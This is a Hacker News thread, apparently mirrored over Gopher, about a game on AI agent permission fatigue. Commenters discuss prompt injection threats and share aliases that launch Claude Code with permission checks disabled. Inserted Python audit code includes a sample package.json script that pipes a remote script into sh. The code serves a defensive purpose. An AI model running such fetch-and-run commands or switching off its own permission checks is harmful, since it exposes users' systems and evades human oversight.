Hacker News on Gopher (unofficial)

       COMMENT PAGE FOR:
   URI   Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue
       
       
        wilg wrote 11 min ago:
        "Auto" in Claude and "Auto-review" in Codex are the only way to do
        agentic coding.
       
        jMyles wrote 12 min ago:
        I haven't run claude code without --dangerously-skip-permissions in
        quite some time.  I'm surprised that it's still the norm to endure
        permission spamming?
        
        (I run it on a VPS of course, not my laptop)
       
        socksy wrote 16 min ago:
         Weird to make reading zshrc supposedly unsafe when I happily publish it
        in my public dotfiles repo... Who the hell keeps API keys in it? OTOH
        it seems like lots of these AI tools keep appending PATH in it so I
        guess there's a fundamental misunderstanding of shell best practices in
        the entire AI space...
        
        Additionally, killing the results of `lsof` is _not_ safe - if, say,
        you have the web page open in firefox, or a client subshell in the
        agent itself, then boom, there goes firefox and the agent.
       
        graphememes wrote 16 min ago:
        Pressed 1 for everything, no regrets
       
        orsorna wrote 21 min ago:
        About three quarters of the "bad" choices are things that not only do I
        not care about leaking but things that an employer would not punish you
        for doing, even if it led to a production incident.
       
        stevenalowe wrote 44 min ago:
        Sadly unplayable - gray text on a black background is very hard to read
        on a phone
       
        martin-adams wrote 52 min ago:
        Very fun. I can only imagine building this with Claude and testing
        needed a bit of mental concentration.
       
        t-writescode wrote 1 hour 22 min ago:
        I was told I was over protective when the text said “I need to wipe
        and build my project” and its first thing to do was to read the
        details of the (already established) package file. Why did it need to
        read the package file to “get context” if it was just doing a
        standard wipe and build?
        
        Apparently me telling it that’s the wrong first step and saying
        “no” is bad; but I’ve seen AI tools waste a ton of time doing a
        bunch of random work before they do their job.
       
        spurgelaurels wrote 1 hour 32 min ago:
        Fun game, but it showed the lack of security hygiene employed by the
        game writer. It said `cat ~/.zshrc` was bad because it would share
        tokens and secrets, but I would never put secrets into my shell rc.
       
          londons_explore wrote 1 hour 9 min ago:
           Plenty of people would. But then I guess they're in env and
          probably already available to Claude
       
          nish__ wrote 1 hour 9 min ago:
          Where would you put them?
       
            Hackbraten wrote 58 min ago:
            Into `pass`, for example:
            
   URI      [1]: https://news.ycombinator.com/item?id=48108207
       
            setopt wrote 58 min ago:
            Presumably a CLI-accessible password manager (like `pass`) or a
            GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).
       
        whimblepop wrote 1 hour 36 min ago:
        I got "overblocked" for this one:
        
          rm -rf node_modules && npm install
        
        but actually if you're only removing `node_modules` and you have a
        working package-lock.json already, what you want is `npm ci`; `npm
        install` can mutate package-lock.json and potentially expose you to
        supply chain attacks. If you use `npm ci` I think you don't need to `rm
        -rf node_modules`, either.
        
        Anyway you should generally run `npm ci` except when you're
        deliberately updating your actual dependencies. I'd only permit an `npm
        install` if I was adding or updating a dependency, or I'd just reviewed
        an `npm ci` failure.
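A check that mirrors what `npm ci` enforces before it refuses to run, added here as an example (not code from the thread and not npm's own logic): it compares package.json against a lockfileVersion 2/3 package-lock.json, using a deliberately minimal matcher for exact, `^` and `~` ranges; both JSON documents are constructed samples.

```python
import json
import re

# Constructed sample files (not from any real project).
PACKAGE_JSON = json.dumps({
    "name": "demo", "version": "1.0.0",
    "dependencies": {"left-pad": "^1.3.0", "express": "^4.18.0"},
    "devDependencies": {"jest": "^29.0.0"},
})
LOCKFILE_JSON = json.dumps({
    "name": "demo", "version": "1.0.0", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"left-pad": "^1.3.0", "express": "^4.18.0"},
             "devDependencies": {"jest": "^29.0.0"}},
        "node_modules/left-pad": {"version": "1.3.0"},
        "node_modules/express": {"version": "4.18.2"},
        "node_modules/jest": {"version": "29.7.0"},
    },
})

def _ver(text):
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"only plain x.y.z versions are handled here: {text}")
    return tuple(int(x) for x in m.groups())

def range_accepts(spec, version):
    """Minimal semver matcher for this example (not npm's full grammar):
    exact 'x.y.z', '^x.y.z' (same major; same minor when major is 0) and
    '~x.y.z' (same major.minor).  Anything else raises."""
    op, base = (spec[0], spec[1:]) if spec[:1] in ("^", "~") else ("", spec)
    lo, v = _ver(base), _ver(version)
    if v < lo:
        return False
    if op == "^":
        return v[0] == lo[0] and (lo[0] != 0 or v[1] == lo[1])
    if op == "~":
        return v[:2] == lo[:2]
    return v == lo

def lockfile_problems(pkg_text, lock_text):
    """Reasons `npm ci` would refuse (where `npm install` would silently
    rewrite the lockfile instead).  An empty list means the files agree."""
    pkg, lock = json.loads(pkg_text), json.loads(lock_text)
    if lock.get("lockfileVersion", 1) < 2:
        return ["lockfileVersion < 2 (no root 'packages' entry) is not handled here"]
    packages = lock.get("packages", {})
    root = packages.get("", {})
    problems = []
    for field in ("dependencies", "devDependencies"):
        declared, locked = pkg.get(field, {}), root.get(field, {})
        if declared != locked:
            problems.append(f"{field} differ: package.json {declared} vs lockfile root {locked}")
        for name, spec in declared.items():
            entry = packages.get(f"node_modules/{name}")
            if entry is None:
                problems.append(f"{name}: declared but not locked")
            elif not range_accepts(spec, entry["version"]):
                problems.append(f"{name}: {spec} does not accept locked {entry['version']}")
    return problems

if __name__ == "__main__":
    print(lockfile_problems(PACKAGE_JSON, LOCKFILE_JSON) or "lockfile in sync: safe to npm ci")
```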
       
          gamer191 wrote 1 hour 18 min ago:
          But also why would Claude need to run `rm -rf node_modules && npm
          install`? Without the context of seeing what changes it’s made,
          I’d be inclined to assume that Claude has added a new dependency,
          which I definitely don’t wanna blindly trust it to install
       
        sukhavati wrote 2 hours 1 min ago:
        Reminds me of the "Papers, please" game. Glory to Arstotzka!
       
        sandeepkd wrote 2 hours 3 min ago:
         Interestingly I kept saying no to everything and somehow I am a
         security conscious rare engineer who actually read the commands. Guess
         doing nothing is the safest approach from a security standpoint.
       
        rvz wrote 2 hours 14 min ago:
        This current thread is proof of AI psychosis.
       
          stuartjohnson12 wrote 2 hours 10 min ago:
          What the hell is going on in this thread? This isn't good. The
          "threats" don't make sense. Oh no, all the sensitive information in
          my package.json...
       
            cobbal wrote 1 hour 6 min ago:
            Here's the threat model I (a luddite) use to evaluate these. The
            claude code harness can be mostly trusted, the model cannot be
            trusted because it is exposed to untrusted data from the internet,
            and there is no separation of data/code in an llm [0][1].
            
            I want to avoid running untrusted code on my local machine, because
            it could steal secrets, install malware, etc.
            
            Since the model is allowed to write without restriction (I think)
            to the project directory, anything in the project directory is also
            untrusted. Running standard commands from the system is fine, as
            long as you know what those commands are going to do. Running
            anything from the local directory should be avoided because the
            code is untrusted.
            
            This is just one security model, there are many others! If a person
            is running claude in a stronger sandbox, that changes the model
            considerably. What threat model do you use to evaluate whether an
            agent's actions are safe?
            
    URI      [0]: https://www.schneier.com/essays/archives/2024/05/llms-data...
    URI      [1]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
       
            kennywinker wrote 1 hour 44 min ago:
            If you think the worst that an agent can do is leak your
            package.json, your threat model is wayyy broken.
       
        NewJazz wrote 2 hours 18 min ago:
        git reset --soft HEAD~1
        
        Uh, how is this an overblock? It is literally a destructive command. No
        way I want an LLM agent rewriting my commit history. What if that
        commit was already pushed to a protected branch?
       
          stratos123 wrote 40 min ago:
          Why do you call it destructive? It rewrites history only locally and
          reversibly (the disappeared commit is still in reflog and can be
          recovered with another reset) and also doesn't destroy uncommitted
          changes, so it's quite safe. You can only lose data with it by
          resetting an unpushed commit and then waiting long enough to let the
          unreferenced commit be garbage collected.
       
            NewJazz wrote 34 min ago:
            Commit history is data. I might not realize what happened until the
            gc happens.
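A throwaway-repo demonstration of both sides of this exchange, added here as an example (not code from the thread): after `git reset --soft HEAD~1` the dropped commit is still in HEAD's reflog and the staged and working-tree files are untouched, so it can be restored; it stays restorable only until the reflog entry expires and a prune runs, which is what a scheduled gc eventually does. It assumes a `git` binary on PATH and creates everything else in a temporary directory.

```python
import os
import shutil
import subprocess
import tempfile

# Fixed identity so commits work on a box with no git config.
IDENTITY = {"GIT_AUTHOR_NAME": "demo", "GIT_AUTHOR_EMAIL": "demo@example.invalid",
            "GIT_COMMITTER_NAME": "demo", "GIT_COMMITTER_EMAIL": "demo@example.invalid"}

def git(repo, *args, check=True):
    """Run one git command in `repo`; returns (exit code, stdout)."""
    r = subprocess.run(["git", "-C", repo, *args], env={**os.environ, **IDENTITY},
                       capture_output=True, text=True, check=check)
    return r.returncode, r.stdout.strip()

def commit_file(repo, name, text, msg):
    with open(os.path.join(repo, name), "w") as f:
        f.write(text)
    git(repo, "add", name)
    git(repo, "commit", "-q", "-m", msg)
    return git(repo, "rev-parse", "HEAD")[1]

def soft_reset_demo():
    """Drop the last commit with --soft and record what survives at each stage."""
    repo = tempfile.mkdtemp(prefix="softreset-")
    try:
        git(repo, "init", "-q")
        first = commit_file(repo, "a.txt", "one\n", "first")
        second = commit_file(repo, "b.txt", "two\n", "second")
        git(repo, "reset", "--soft", "HEAD~1")
        obs = {
            "first": first, "second": second,
            "head_after": git(repo, "rev-parse", "HEAD")[1],
            # --soft moves HEAD only: index and working tree still hold b.txt
            "b_on_disk": os.path.exists(os.path.join(repo, "b.txt")),
            "b_staged": "b.txt" in git(repo, "diff", "--cached", "--name-only")[1],
            # the dropped commit is still recorded in HEAD's reflog ...
            "in_reflog": second in git(repo, "log", "-g", "--format=%H")[1],
        }
        # ... so it can be restored from there
        git(repo, "reset", "--hard", second)
        obs["recovered"] = git(repo, "rev-parse", "HEAD")[1] == second
        # The other half: drop it again, expire the reflog and prune.  A scheduled
        # gc does this eventually; after it the commit object no longer exists.
        git(repo, "reset", "--soft", "HEAD~1")
        git(repo, "update-ref", "-d", "ORIG_HEAD", check=False)  # pointer reset leaves behind
        git(repo, "reflog", "expire", "--expire=now", "--all")
        git(repo, "gc", "-q", "--prune=now")
        obs["gone_after_gc"] = git(repo, "cat-file", "-e", second, check=False)[0] != 0
        return obs
    finally:
        shutil.rmtree(repo, ignore_errors=True)

if __name__ == "__main__":
    for key, value in soft_reset_demo().items():
        print(f"{key:14} {value}")
```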
       
        ilaksh wrote 2 hours 27 min ago:
        You can turn that off with an option in most agents.
        
        My own agent harness/framework has never had any permission system.
        It's also never deleted anything it shouldn't or done anything crazy or
        unrelated to what I asked.
       
          flux3125 wrote 2 hours 13 min ago:
          > It's also never deleted anything it shouldn't or done anything
          crazy or unrelated to what I asked
          
          Until it does. A simple curl request to a compromised website could
          inject a malicious prompt into it.
       
          fragmede wrote 2 hours 17 min ago:
          How many car accidents have you been in, and do you wear your
          seatbelt when you're in a car?
       
        Trung0246 wrote 2 hours 29 min ago:
        Nice got 6/6
       
        xg15 wrote 2 hours 35 min ago:
        This is amazing!
        
        Currently you can "cheat" by simply denying all requests as quickly as
        possible. This will give you the "security-conscious engineer" badge
        and a perfect score in terms of how many requests were processed. (You
        will get the "overblock" notification, but it's somewhat tucked away at
        the bottom and the screen still looks as if you won)
        
        I also tried to play as the hustle4lyfe move fast and break things
        engineer and simply approved as many requests as quickly as possible -
        turns out, the "malicious command" popups actually slow you down. Mean!
       
        misbau wrote 2 hours 37 min ago:
        That was fun and gave me an idea how security conscious I am.
       
        ramonga wrote 2 hours 38 min ago:
        Score is 6711 by just saying no to everything
       
        atemerev wrote 2 hours 39 min ago:
        --dangerously-skip-permissions is the only way to fly. Of course your
        environment needs to be properly containerized and autobackup set up,
        so even rm -rf from your harness would do nothing. Life is too short to
        spend on replying to permissions requests.
       
          prerok wrote 1 hour 52 min ago:
           I've seen these suggestions but I am really curious about the setup
           because I just don't get it.
          
          If you want to work on the code then you need to have access to the
          repositories, so you need the github token. Then, to test the app,
          you may need your own backend token. And VPN. Of course, only to DEV,
          of course all tokens encrypted. So, only DEV and your branch of the
          code is in danger. In my view, even that is pretty bad.
          
           So, how does such a setup work?
       
          kennywinker wrote 1 hour 54 min ago:
          Lol. Countdown til you get pwned starts today. Let me know how that
          works out for you in six months.
       
        kqr wrote 2 hours 41 min ago:
        Fun! Played twice and refused all dangerous commands, with only one
        "over-block". Although I disagree that saying no to `kill $(lsof -t
        -i:3000)` is over-blocking. It's such a simple command I'd rather run
        it myself and be fully aware of what process I'm killing.
       
        axod wrote 2 hours 43 min ago:
        Fun little game, but I think the questions jump context so much it's a
        little unrepresentative. It might be better to group things into
        "packs", which have more real-world representative structure to them.
        For example, lots of "editing something.js" file permission requests,
        and then an "npm publish" is far more normal, and it's more of a risk,
        if you're used to pressing Y lots and then suddenly out of the blue...
       
        bspammer wrote 2 hours 45 min ago:
        To be realistic, 99% of the time it should be a totally innocuous
        command. If half of the commands are dangerous then you don't get
        fatigue because you're aware what you're doing is dangerous.
       
        Wirbelwind wrote 2 hours 46 min ago:
        Thanks all for checking it out and your suggestions!
        
        If anyone is curious about the actual underlying risks and problems
        with some mitigations (like the 17% false-negative rates of Auto Mode),
        I wrote up a quick summary of some of the approaches here
        
   URI  [1]: https://scalex.dev/blog/ai-agent-permissions/
       
        soanvig wrote 2 hours 54 min ago:
        Fun game.
        Can somebody run an agent against those questions to see how it
        performs? :)
       
        zackify wrote 3 hours 9 min ago:
        I vibe coded a TUI that just shows running lxd containers
        
        I hit 'n' to toggle all network access minus anthropic and openai URLs.
        
        I use pi (sometimes claude, always on bypass) and I auto allow
        everything. I only toggle manual approval in rare cases like running a
        script or command that needs to touch a production system and I need to
        validate everything.
        
        Normally my container has full write access to staging so it can debug
        and validate everything on its own
       
          kennywinker wrote 1 hour 58 min ago:
          Sounds like your process has made you vulnerable to huge classes of
          exploits and accidents. You have no oversight of changes locally, and
          only focus on when it touches prod. That means toxic local changes
          can get in, and if it works in staging why would you look too closely
          at it before merging to prod? Meanwhile a malicious npm package has
          made it into your repo, and your staging api keys have been sent to
          the command and control server.
       
        cobbal wrote 3 hours 10 min ago:
        That's funny. It told me that blocking "npm run build" was the wrong
         answer. Maybe it doesn't really understand the threat model.
       
          dns_snek wrote 2 hours 12 min ago:
          That's a great example of how dangerous actions are perceived as
          innocent. The entire model of approving specific commands is
          absolutely bonkers.
          
          npm run build = run an arbitrary shell command written in
          package.json
          
          Meanwhile the agent could have done any of the following without
          approval:
          
          - edited `package.json` to contain any arbitrary build command
          
          - planted malicious code in `build.js` (called by `npm run build`)
          
          - planted malicious code in `node_modules/xyz/index.js` (imported by
          `build.js`)
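An added example (not code from the thread or any project) that does the two things argued for in cobbal's threat model further up and in the comment above: it expands `npm run build` into the lines npm would actually run, `pre`/`post` hooks included, and classifies each executable as coming from the attacker-writable checkout, from a program piped into an interpreter, or from a system binary whose arguments still need review. The package.json, the checkout path and the contents of node_modules/.bin are constructed assumptions.

```python
import json
import os
import shlex

# Constructed package.json, checkout path and node_modules/.bin contents (not a real project).
PACKAGE_JSON = json.dumps({"name": "demo", "scripts": {
    "prebuild": "node scripts/gen.js",
    "build": "tsc -p . && cp -r assets dist/",
    "postbuild": "curl -s https://example.invalid/setup | sh",
}})
PROJECT_DIR = "/home/dev/demo"            # assumed location of the checkout
PROJECT_BINS = {"tsc", "jest", "eslint"}  # assumed contents of node_modules/.bin
INTERPRETERS = {"node", "sh", "bash", "python", "python3"}
SEPARATORS = {"&&", "||", ";", "|", "|&", "(", ")"}

def expand_npm_run(pkg_text, name):
    """Shell lines npm runs for `npm run <name>`: pre<name>, <name>, post<name>, in order."""
    scripts = json.loads(pkg_text).get("scripts", {})
    if name not in scripts:
        raise KeyError(f"no script named {name!r}")
    return [scripts[k] for k in (f"pre{name}", name, f"post{name}") if k in scripts]

def simple_commands(shell_line):
    """Split on pipes and control operators into (argv, reads_from_pipe) pairs."""
    lex = shlex.shlex(shell_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    cmds, argv, piped, skip = [], [], False, False
    for tok in lex:
        if skip:                          # redirect target, not a command word
            skip = False
        elif tok in (">", ">>", "<"):
            skip = True
        elif tok in SEPARATORS:
            if argv:
                cmds.append((argv, piped))
            argv, piped = [], tok in ("|", "|&")
        elif argv or "=" not in tok:      # drop leading VAR=value assignments
            argv.append(tok)
    if argv:
        cmds.append((argv, piped))
    return cmds

def in_checkout(path, project_dir=PROJECT_DIR):
    return os.path.normpath(os.path.join(project_dir, path)).startswith(project_dir + os.sep)

def origin(argv, piped_in, project_dir=PROJECT_DIR, project_bins=PROJECT_BINS):
    """'project' if the code that runs lives in the attacker-writable checkout,
    'stdin' if an interpreter takes its program from a pipe, else 'system'."""
    exe, args = argv[0], argv[1:]
    if "/" in exe:                        # explicit path, resolved against the checkout
        return "project" if in_checkout(exe, project_dir) else "system"
    if exe in project_bins:               # npm prepends node_modules/.bin to PATH
        return "project"
    if exe in INTERPRETERS:
        if any(not a.startswith("-") and in_checkout(a, project_dir) for a in args):
            return "project"              # system interpreter, but the program is ours
        if piped_in:
            return "stdin"
    return "system"

def audit(pkg_text, name):
    """One (shell line, executable, origin) row per simple command npm would run."""
    return [(line, argv[0], origin(argv, piped)) for line in expand_npm_run(pkg_text, name)
            for argv, piped in simple_commands(line)]
```

Run `audit(PACKAGE_JSON, "build")` to see that approving "npm run build" here means approving five commands, two of them project code and one a script read from a pipe.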
       
            nonethewiser wrote 36 min ago:
            Yup. The most secure computer is one encased in concrete and
            dropped into the ocean.
       
            amarant wrote 44 min ago:
            What would a better system look like?
       
              nonethewiser wrote 35 min ago:
              Not using agents at all. It could edit your code to do something
              malicious when you run it. Not even once. Not even if the agent
              has a gun to your head.
       
        Liftyee wrote 3 hours 19 min ago:
        I haven't used local agentic AI yet for programming projects. Hence,
        -187 score
        
        The filter for "commands I would run myself" and "commands I would let
        an agent run" are very different it seems.
       
          rogerrogerr wrote 23 min ago:
          Thinking about agents as remote junior devs who _might_ be North
          Korean operatives has been the right model for me.
       
        ghrl wrote 3 hours 21 min ago:
        I am mostly using OpenCode and barely ever see a permission prompt.
        While they do enforce it for outside workspace read/write, with the
        bash tool the agent can just bypass that. I'm not quite sure why it is
        that way, and it certainly isn't a very good solution, but likely not
        worse than asking for everything which just trains the user to always
        accept and provides a false sense of security then.
       
        sevenseacat wrote 3 hours 28 min ago:
        Continue? Y/N ── SCORE: 2,343
         Security-Conscious Engineer
        
        Caught 8/8 threats
        "Not a single secret leaked"
        
        → llmgame.scalex.dev
       
          neogodless wrote 33 min ago:
          Continue? Y/N ── SCORE: 1,549 Security-Conscious Engineer
          
          Caught 3/3 threats "Not a single secret leaked"
          
          So are there 3 threats? 8? Is it a different game?
          
          Does everyone get a "good" score even if they missed 5 threats?!
       
        MeetingsBrowser wrote 3 hours 32 min ago:
        It would be cool to see the distribution of all player scores.
       
          Wirbelwind wrote 2 hours 50 min ago:
          That's a great idea, stay tuned
       
        carterschonwald wrote 3 hours 34 min ago:
         some of the sandboxing I've been playing with gives me the best of both
         yolo and like logic programming tier perms on llm actions in env.
         still not ready for prime time though ;)
       
          ashishb wrote 46 min ago:
          I ended up writing my own.
          
          And have been running LLMs as well as simple tools like linters and
          even `npm` inside it for months now.
          
   URI    [1]: https://ashishb.net/programming/amazing-sandbox/
       
        cadwell wrote 3 hours 37 min ago:
        1,640 points on my first try—I fell into a few traps, but it was
        really interesting. Thanks for the little game! I'm sharing it with my
        coworkers :)
       
        nardib wrote 5 hours 35 min ago:
        Use this and save yourself:
        
        claude --dangerously-skip-permissions
       
          maxbond wrote 57 min ago:
          Why would you do this now that we have auto mode?
       
          kennywinker wrote 1 hour 51 min ago:
          It’s baking malicious code into your project, but hey it didn’t
          run rm -rf so… we’re good.
       
          paulddraper wrote 2 hours 22 min ago:
          alias yolo=claude --dangerously-skip-permissions
       
          dheera wrote 3 hours 12 min ago:
          I got tired of typing that and just do
          
              alias claude="claude --dangerously-skip-permissions"
          
          I do have a separate "claude" user on my system without sudo access
          and without access to my main user home dir
          
          And yeah I know that's not perfect but I'm trying to get shit done
       
            franze wrote 2 hours 47 min ago:
            alias claude+="claude --dangerously-skip-permissions"
            
            alias claude++="claude --dangerously-skip-permissions --continue"
       
          tasuki wrote 3 hours 31 min ago:
          Just make sure to run it in an isolated environment where it's ok to
          mess things up, and make sure it doesn't have access to any secrets.
       
          wildpeaks wrote 3 hours 38 min ago:
          This is why having a human in the loop isn't enough because they will
          cut corners and skip reviewing what they should review.
       
            preciousoo wrote 2 hours 45 min ago:
            I created a watcher for this problem, to watch my PRs for
            unfinished scope and have a fresh Claude review
            
            Uses tmux and gh
            
   URI      [1]: https://github.com/Kyu/claude-pr-watch
       
            chuckadams wrote 3 hours 34 min ago:
             A tool that pushes people into permissions fatigue is in fact the
             proper recipient of the blame. The tool in question here is the
             entire system though, including the OS with insufficient permission
             boundaries in userspace, not just the agent
       
              kennywinker wrote 1 hour 47 min ago:
              A tool that bypasses permission requests because they’re
              annoying will be just as guilty when the repo is poisoned.
       
                chuckadams wrote 37 min ago:
                I'm not saying wedging doorstops under the fire doors is a good
                thing, I'm just saying look at the situation that's making
                people put the doorstops there.  Or something, it's not a great
                analogy.  I'm just saying that shaming the user belongs with
                obscurity in the list of security mechanisms that don't work
                out in practice.
       
          qsxfthnkp2322 wrote 3 hours 41 min ago:
          I love it when Claude is dangerous
       